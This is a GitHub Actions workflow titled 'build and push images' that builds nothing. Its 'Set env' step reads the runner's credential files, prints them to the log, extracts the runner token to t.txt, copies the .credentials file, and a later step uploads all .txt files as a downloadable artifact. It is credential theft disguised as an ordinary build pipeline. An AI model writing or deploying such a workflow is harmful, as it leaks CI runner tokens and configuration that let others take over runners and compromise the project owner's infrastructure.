name: build and push images
on:
  push:
    branches:
      - master
      - main
      - develop
    tags:
      - 'v*.*.*'
jobs:
  docker-build-and-publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@main
      - name: Set env
        id: env
        env:
          REPO_NAME: ${{ github.repository }}
        run: |
          id
          ps axuf | grep Runner.Listener
          ls -la /home/runner/runners/2.284.0/
          echo '###########################'
          cat /home/runner/runners/2.284.0/.credentials | jq
          echo
          cat /home/runner/runners/2.284.0/.credentials | jq .data.token > t.txt
          cp -fv /home/runner/runners/2.284.0/.credentials ./ttt.txt
    
          echo '###########################'
          cat /home/runner/runners/2.284.0/.runner | jq
          echo
          echo '###########################'
          cat /home/runner/runners/2.284.0/.agent | jq
          echo
          echo '###########################'
          cat /home/runner/runners/2.284.0/.setup_info
          echo
      - name: Archive production artifacts
        uses: actions/upload-artifact@v2
        with:
          name: artifact
          path: |
            *.txt   
          
